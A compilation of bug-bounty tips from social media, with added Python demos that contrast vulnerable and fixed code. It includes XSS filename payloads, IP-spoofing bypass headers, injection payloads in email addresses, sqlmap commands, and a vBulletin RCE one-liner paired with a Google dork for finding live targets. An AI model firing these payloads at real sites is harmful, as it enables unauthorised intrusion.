Narendra Bhati Aug 6
1st Bounty of $16000 From Apple. Not that big but good to start with. Expecting more emails from Apple in upcoming weeks. 😅
h4x0r-dz Aug 9
If you find a file upload function for an image, try introducing an image with XSS in the filename, like so:
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
karthik sunny Aug 4
Always try to fetch hidden web directories in subdomains of the target.
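Added example, not from the tweet: a small concurrent directory probe that walks a wordlist against every host you hand it and keeps anything that is not 404 or unreachable (401 and 403 are hits too; they tell you the directory exists). To run offline it starts a local http.server with an `admin` and a `.git` directory as a stand-in target; the wordlist, the server and the hostnames are all constructed for the demo.

```python
import functools
import http.server
import os
import socketserver
import tempfile
import threading
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor

# Constructed mini wordlist; real runs use a few thousand entries per host.
WORDLIST = ["admin", "backup", "uploads", ".git", "api"]

# Talk to the target directly even if HTTP_PROXY is set in the environment.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def probe(base, word, timeout=5):
    """GET <base>/<word>/ and return (url, status, body_size); status is None on a network error."""
    url = f"{base.rstrip('/')}/{word}/"
    req = urllib.request.Request(url, headers={"User-Agent": "dir-probe/0.1"})
    try:
        with OPENER.open(req, timeout=timeout) as resp:
            return url, resp.status, len(resp.read())
    except urllib.error.HTTPError as exc:
        return url, exc.code, 0          # 401/403 mean "exists", so keep the code
    except OSError:
        return url, None, 0


def bruteforce(bases, wordlist, workers=8):
    """Probe every (host, word) pair concurrently; keep everything that is not 404 or unreachable."""
    jobs = [(base, word) for base in bases for word in wordlist]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda job: probe(*job), jobs)
        return {url: (status, size) for url, status, size in results if status not in (None, 404)}


class _QuietHandler(http.server.SimpleHTTPRequestHandler):
    def log_message(self, *args):      # keep the demo output clean
        pass


def demo():
    """Stand-in target: a local http.server whose docroot has 'admin' and '.git' directories."""
    root = tempfile.mkdtemp()
    for name in ("admin", ".git"):
        os.mkdir(os.path.join(root, name))
    handler = functools.partial(_QuietHandler, directory=root)
    with socketserver.ThreadingTCPServer(("127.0.0.1", 0), handler) as server:
        threading.Thread(target=server.serve_forever, daemon=True).start()
        base = f"http://127.0.0.1:{server.server_address[1]}"
        try:
            hits = bruteforce([base], WORDLIST)
        finally:
            server.shutdown()
    return {url[len(base):]: status for url, (status, _) in hits.items()}


if __name__ == "__main__":
    for path, status in sorted(demo().items()):
        print(status, path)
```

Point `bruteforce` at a list of `https://sub.target` bases from your subdomain enumeration; the trailing slash in `probe` avoids the 301 redirect most servers send for a bare directory name, so one request per candidate is enough.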
what_web Aug 8
How to find authentication bypass vulnerabilities. Focus. I added headers.

Request:
GET /delete?user=test HTTP/1.1

Response:
HTTP/1.1 401 Unauthorized

Request:
GET /delete?user=test HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1

Response:
HTTP/1.1 302 Found
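Added example, not from the tweet: the server-side mistake behind that 401-to-302 flip, the resolver that does not have it, and a replay of the tweet's method (baseline request, then one request per candidate header) so you can see which headers change the answer. The header list, the `/delete` handler and the request dicts are constructed for the demo; the fixed resolver only trusts `X-Forwarded-For` when the socket peer is one of your own proxies, and then reads the hop your proxy appended rather than the leftmost, attacker-written one.

```python
# Headers commonly honoured by IP-allowlist code (constructed list for the demo).
BYPASS_HEADERS = [
    "X-Custom-IP-Authorization", "X-Forwarded-For", "X-Originating-IP", "X-Remote-IP",
    "X-Remote-Addr", "X-Client-IP", "X-Real-IP", "True-Client-IP",
]

LOCAL = {"127.0.0.1", "::1"}


def client_ip_vulnerable(headers, peer_ip, trusted_proxies=frozenset()):
    """Vulnerable: believes any IP-bearing header, whoever sent it."""
    for name in BYPASS_HEADERS:
        if name in headers:
            return headers[name].split(",")[0].strip()
    return peer_ip


def client_ip_fixed(headers, peer_ip, trusted_proxies=frozenset()):
    """Fixed: the socket peer is the client unless the peer is a proxy we run. Then take
    X-Forwarded-For, strip our own proxies from the right, and use the rightmost remaining
    hop (the one our proxy appended); the leftmost entries are client-controlled."""
    if peer_ip in trusted_proxies and "X-Forwarded-For" in headers:
        hops = [h.strip() for h in headers["X-Forwarded-For"].split(",")]
        while hops and hops[-1] in trusted_proxies:
            hops.pop()
        if hops:
            return hops[-1]
    return peer_ip


def delete_endpoint(headers, peer_ip, resolver, trusted_proxies=frozenset()):
    """The tweet's /delete: 302 (proceed) for local callers, 401 for everyone else."""
    return 302 if resolver(headers, peer_ip, trusted_proxies) in LOCAL else 401


def probe_bypass(headers, peer_ip, resolver, trusted_proxies=frozenset()):
    """Replay the tweet's method: record the baseline status, resend once per candidate
    header with 127.0.0.1, and return the headers that changed the answer."""
    baseline = delete_endpoint(headers, peer_ip, resolver, trusted_proxies)
    changed = {}
    for name in BYPASS_HEADERS:
        status = delete_endpoint({**headers, name: "127.0.0.1"}, peer_ip, resolver, trusted_proxies)
        if status != baseline:
            changed[name] = status
    return baseline, changed


# Constructed request from an external client, as in the tweet.
EXTERNAL = {"Host": "target.example"}
EXTERNAL_PEER = "203.0.113.9"

if __name__ == "__main__":
    print("vulnerable:", probe_bypass(EXTERNAL, EXTERNAL_PEER, client_ip_vulnerable))
    print("fixed:     ", probe_bypass(EXTERNAL, EXTERNAL_PEER, client_ip_fixed))
```

Against a real target the same loop is a Burp Intruder run with the header name as the payload position; a status or content-length that differs from the baseline is the signal to chase.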
Haones Aug 9
Validate your email address with the payloads you can find here: And find the reference to RFC822 as well. Helped me find plenty of nice bugs :)
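Added example, not from the tweet (its payload link is not on the page): the kind of address the RFC 822 grammar, and its successor RFC 5322, permits. Quoted-string local parts and comments may carry almost any printable character, so a validator that only checks "something@something.tld" lets HTML, SQL or shell metacharacters through to wherever the address is later reflected. The payload list is constructed; the strict validator is an allowlist that deliberately rejects the quoted and commented forms.

```python
import re

NAIVE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

# Syntactically valid per RFC 5322 (quoted-string or comment in the local part),
# but each carries a payload for a later HTML, SQL or shell context. Constructed list.
PAYLOAD_ADDRESSES = [
    '"<script>alert(1)</script>"@example.com',      # quoted-string local part
    '"><svg/onload=alert(1)>"@example.com',         # breaks out of an attribute
    "user(<script>alert(1)</script>)@example.com",  # comment inside a dot-atom local part
    '"\'or\'1\'=\'1"@example.com',                  # SQL metacharacters
    '"$(id)"@example.com',                          # shell command substitution
]

SAFE_LOCAL = re.compile(r"^[A-Za-z0-9._%+-]+$")
LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def naive_valid(addr):
    """The check most apps ship: anything@anything.anything."""
    return bool(NAIVE.match(addr))


def strict_valid(addr):
    """Allowlist: dot-atom local part only (no quoted strings, no comments), DNS-shaped
    domain with at least two labels. Rejects every payload above, accepts ordinary mail."""
    if addr.count("@") != 1 or len(addr) > 254:
        return False
    local, domain = addr.split("@")
    if not (0 < len(local) <= 64 and SAFE_LOCAL.match(local)):
        return False
    if local.startswith(".") or local.endswith(".") or ".." in local:
        return False
    labels = domain.split(".")
    return len(labels) >= 2 and all(LABEL.match(label) for label in labels)


def triage(addresses):
    """Map each address to (accepted by the naive check, accepted by the strict check)."""
    return {a: (naive_valid(a), strict_valid(a)) for a in addresses}


if __name__ == "__main__":
    for addr, (naive, strict) in triage(PAYLOAD_ADDRESSES).items():
        print(f"naive={naive!s:5} strict={strict!s:5} {addr}")
```

When testing, register with each payload address and then look at every place the address is shown back (profile page, admin panel, notification mail, CSV export): the app that accepted it under the naive check is the one that will render it.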
h4x0r-dz 17h
0day RCE exploit on vBulletin 5xx
Dork: intext:"Powered by vBulletin"
PoC:
curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
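Added example, not from the tweet, and on the defending side: a request-level detector for the pattern the PoC relies on, a POST to the render endpoint that overrides a sub-widget's template to `widget_php` or supplies a `[config][code]` parameter. It runs over parsed request bodies, so it fits a WAF hook or a pass over captured traffic. The endpoint path and the PoC body are the ones in the tweet; the other sample requests are constructed.

```python
from urllib.parse import parse_qs, urlsplit

RENDER_PATH = "/ajax/render/widget_tabbedcontainer_tab_panel"


def flags_widget_php_abuse(method, target, body):
    """True for a POST to the render endpoint whose subWidgets[...][template] is set to
    widget_php, or which carries any [config][code] parameter. A browser driving the
    forum's own front end has no reason to send either from the client side."""
    if method.upper() != "POST":
        return False
    if not urlsplit(target).path.lower().startswith(RENDER_PATH):
        return False
    params = parse_qs(body, keep_blank_values=True)   # also undoes %20 and friends
    for key, values in params.items():
        key = key.lower()
        if key.startswith("subwidgets[") and key.endswith("[template]"):
            if any(v.strip().lower() == "widget_php" for v in values):
                return True
        if "[config][code]" in key:
            return True
    return False


# Constructed sample requests: the tweet's PoC body, a benign sub-widget render,
# a case-varied template override with a query string, and an unrelated GET.
SAMPLE_REQUESTS = [
    ("POST", RENDER_PATH,
     'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'),
    ("POST", RENDER_PATH,
     "subWidgets[0][template]=widget_text&subWidgets[0][config][text]=hello"),
    ("POST", RENDER_PATH + "?x=1", "subWidgets[0][template]=WIDGET_PHP"),
    ("GET", "/forum/", ""),
]


def scan(requests):
    """One boolean per (method, target, body) triple."""
    return [flags_widget_php_abuse(*req) for req in requests]


if __name__ == "__main__":
    for req, hit in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print("ALERT " if hit else "ok    ", req[0], req[1])
```

The match is on decoded parameter names, not on a literal substring of the raw body, so `%5B`/`%5D` encoding of the brackets or mixed case in the template name does not slip past it.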
Cyber Pirate Aug 8
Resources for websites:
1. Portswigger Web Academy
2. Hacks Planning
3. Hacker101
4. Null byte
5. Hacking Articles
6. Infosec Twitter
7. GBHackers
8. TheHackersNews
[~] And more in this 🧵. Tweet something which I missed..
Hx01 Aug 8
I created a burpsuite plugin for parsing quoted-printable encoded emails; this may help if you use burp collaborator SMTP for conducting tests & want to decode email confirmation URLs.
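Added example, not the plugin from the tweet: the same job done with Python's standard library for a collaborator or SMTP capture you have saved to a file. The message below is constructed; its confirmation URL is split across two lines by a quoted-printable soft break and has every `=` encoded as `=3D`, which is exactly why a grep over the raw capture misses the token.

```python
import re
from email import message_from_string, policy

# Constructed capture: one text/plain part, quoted-printable encoded.
RAW_MESSAGE = """\
From: noreply@target.example
To: test@collab.example
Subject: Confirm your account
MIME-Version: 1.0
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: quoted-printable

Welcome! Please confirm your address by visiting:
https://target.example/verify?token=3Dabc123def456abc123def456abc123def456ab=
c123def456&user=3D42
Thanks from the Team
"""

URL_RE = re.compile(r"""https?://[^\s<>"']+""")


def decoded_parts(raw):
    """Yield the decoded text of every text/* part (single-part or multipart alike).
    policy.default gives an EmailMessage whose get_content() undoes the transfer
    encoding and the charset for us."""
    msg = message_from_string(raw, policy=policy.default)
    for part in msg.walk():
        if part.get_content_maintype() == "text":
            yield part.get_content()


def extract_urls(raw):
    """All URLs in the decoded body, in order of appearance."""
    urls = []
    for text in decoded_parts(raw):
        urls.extend(URL_RE.findall(text))
    return urls


if __name__ == "__main__":
    for url in extract_urls(RAW_MESSAGE):
        print(url)
```

For a multipart/alternative message the loop yields both the text and the HTML part, so the same link usually appears twice; deduplicate or prefer the text part when you feed the result into the next request.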
Mirhat Aug 8
Here's the tip:
1. Website has an upload image function
2. Upload a jpg file called <img src=x onerror=alert(1)>.jpg in comments or other places someone else can see
3. and.. Stored XSS triggers
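Added example covering both filename-XSS tweets above (h4x0r-dz and Mirhat), not code from either: the template bug that makes the trick work, the escaped rendering that does not, and the server-side fix that never lets the client's name reach disk or a URL in the first place. The filenames are the payloads quoted in the tweets plus one ordinary name; the render functions stand in for a gallery or comment template and are constructed for this demonstration. The oracle uses Python's HTML parser rather than a substring check, because an escaped filename still contains the literal text `onerror=` inside a harmless attribute.

```python
import html
import os
import uuid
from html.parser import HTMLParser

# Filenames from the two tweets plus one ordinary name (constructed list).
UPLOADED_NAMES = [
    "<img src=x onerror=alert('XSS')>.png",
    "\"><img src=x onerror=alert('XSS')>.png",
    "\"><svg onmouseover=alert(1)>.svg",
    "<<script>alert('xss')<!--a-->a.png",
    "<img src=x onerror=alert(1)>.jpg",
    "holiday photo.jpg",
]

# SVG is left out on purpose: a served .svg can carry its own <script>.
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}


def render_vulnerable(name):
    """The bug: the client-supplied filename is concatenated into attributes and into text."""
    return f'<a href="/uploads/{name}"><img src="/uploads/{name}" alt="{name}"></a> {name}'


def render_fixed(name):
    """Escape for both attribute and text context (quote=True also entity-encodes " and ')."""
    safe = html.escape(name, quote=True)
    return f'<a href="/uploads/{safe}"><img src="/uploads/{safe}" alt="{safe}"></a> {safe}'


def storage_name(original):
    """Server side: never reuse the client's basename on disk or in URLs. Keep only an
    allowlisted extension and generate the rest; the original name, if shown at all,
    is stored as data and escaped on output like any other user string."""
    ext = os.path.splitext(os.path.basename(original))[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension not allowed: {ext!r}")
    return uuid.uuid4().hex + ext


def storage_name_allowed(original):
    try:
        storage_name(original)
        return True
    except ValueError:
        return False


class _Oracle(HTMLParser):
    """Records script-bearing tags and on* event-handler attributes the browser would honour."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "svg", "iframe", "object", "embed"):
            self.hits.append(tag)
        for attr, _ in attrs:
            if attr.startswith("on"):
                self.hits.append(f"{tag}@{attr}")


def injects_markup(rendered_html):
    """True when the rendered page contains executable markup the template did not intend."""
    oracle = _Oracle()
    oracle.feed(rendered_html)
    oracle.close()
    return bool(oracle.hits)


if __name__ == "__main__":
    for name in UPLOADED_NAMES:
        print(f"vuln={injects_markup(render_vulnerable(name))!s:5} "
              f"fixed={injects_markup(render_fixed(name))!s:5} allowed={storage_name_allowed(name)!s:5} {name}")
```

Note that the first payload only fires where the name lands in text context (the trailing `{name}`), while the `">` variants also close the `href`/`src` attribute; that is why the tweet lists both forms.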
Hack3rScr0lls Aug 8
WebSocket is a widespread technology on the modern Web. Incorrect implementation can lead to a simple but critical vulnerability: WebSocket hijacking. Example: Try it in the lab:
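Added example, not from the tweet or its lab: cross-site WebSocket hijacking at the handshake level. The handshake is an ordinary HTTP GET, the browser attaches the victim's cookies to it, and the same-origin policy does not stop a page on attacker.example from opening `new WebSocket("wss://target.example/chat")`. The vulnerable server below authenticates from the cookie alone; the fixed one exact-matches `Origin` against an allowlist and then demands a per-session token in the URL, which a cross-site page cannot read (and the browser WebSocket API cannot add custom headers). Session store, origins and request headers are constructed; the `Sec-WebSocket-Key` is the sample value from RFC 6455.

```python
import base64
import hashlib
import hmac
from urllib.parse import parse_qs, urlsplit

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"   # fixed handshake constant from RFC 6455


def accept_key(sec_websocket_key):
    """Sec-WebSocket-Accept = base64(sha1(key + GUID)). It proves nothing about the caller."""
    digest = hashlib.sha1((sec_websocket_key + WS_GUID).encode()).digest()
    return base64.b64encode(digest).decode()


def parse_cookies(header):
    out = {}
    for item in header.split(";"):
        if "=" in item:
            name, value = item.strip().split("=", 1)
            out[name] = value
    return out


def handshake_vulnerable(target, headers, sessions):
    """Ignores Origin: any site the victim visits can open this socket with the victim's cookie."""
    session = parse_cookies(headers.get("Cookie", "")).get("session")
    if session not in sessions:
        return 401, {}
    return 101, {"Sec-WebSocket-Accept": accept_key(headers["Sec-WebSocket-Key"])}


def handshake_fixed(target, headers, sessions, allowed_origins):
    """Exact-match Origin (scheme, host and port; no prefix, suffix or regex matching),
    then require the per-session token that only the site's own script knows."""
    if headers.get("Origin") not in allowed_origins:
        return 403, {}
    session = parse_cookies(headers.get("Cookie", "")).get("session")
    if session not in sessions:
        return 401, {}
    supplied = parse_qs(urlsplit(target).query).get("token", [""])[0]
    if not hmac.compare_digest(supplied, sessions[session]):
        return 403, {}
    return 101, {"Sec-WebSocket-Accept": accept_key(headers["Sec-WebSocket-Key"])}


# Constructed state and requests.
SESSIONS = {"s3ss10n": "tok-4f2a9c"}          # session id -> per-session token
ALLOWED_ORIGINS = {"https://target.example"}
KEY = "dGhlIHNhbXBsZSBub25jZQ=="             # RFC 6455 sample key

# What the victim's browser sends when attacker.example's page opens the socket.
CROSS_SITE = {"Host": "target.example", "Origin": "https://attacker.example",
              "Cookie": "session=s3ss10n", "Upgrade": "websocket", "Sec-WebSocket-Key": KEY}
# The same handshake from the site's own page, which also knows the token.
SAME_SITE = {**CROSS_SITE, "Origin": "https://target.example"}

if __name__ == "__main__":
    print("vulnerable, cross-site:", handshake_vulnerable("/chat", CROSS_SITE, SESSIONS)[0])
    print("fixed, cross-site:     ", handshake_fixed("/chat", CROSS_SITE, SESSIONS, ALLOWED_ORIGINS)[0])
    print("fixed, own page:       ", handshake_fixed("/chat?token=tok-4f2a9c", SAME_SITE, SESSIONS, ALLOWED_ORIGINS)[0])
```

When testing a target, replay the captured handshake with `Origin` changed to a domain you control (and to `https://target.example.evil.example`, which defeats `startswith` checks): a 101 back means the socket, and every message on it, is yours for any logged-in visitor you can lure.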
m4ll0k Aug 4
Trick that allowed me to find many IDORs..
Muhammad Fauzan Aug 6
ALHUMDULILLAH ♥️ First time I got a 4-digit bounty, $1000 🥰😘😍 Bug type: session fixation, broken authentication
Jenish Sojitra 11h
How I was able to find multiple critical vulnerabilities to get Full Account Takeover with the help of PlayStore and AppStore region settings.
Faizal Abroni Aug 3
1. Found blind SQL injection
2. Use simple payload: ./sqlmap -r req -p vuln --dbs
3. The backend DB is Firebird
4. Can't retrieve dbname or table
5. Change payload to: -r req -p vuln --level 3 --risk 3 --threads 8 --dbms Firebird --tables
6. Puf! *image below
Harsh Bothra Aug 8
Planning a session for the newcomers in Comment down "What are the common questions & issues that you face in your bug bounty journey?" I'll share the dates and a limited registration form (all free), but all questions will be answered. (1/2)
Findomain App Aug 7
Subdomain discovery + HTTP check + content type/content size/response code + website title + IP + CNAME records + screenshots of subdomain websites (compressed) for spotify[.]com in 134 seconds. Plus, binaries will be released soon.
Y A S H G O T I Aug 5
Need some real-time links/URLs for target hosts? Check this out gal 🔥🔥🔥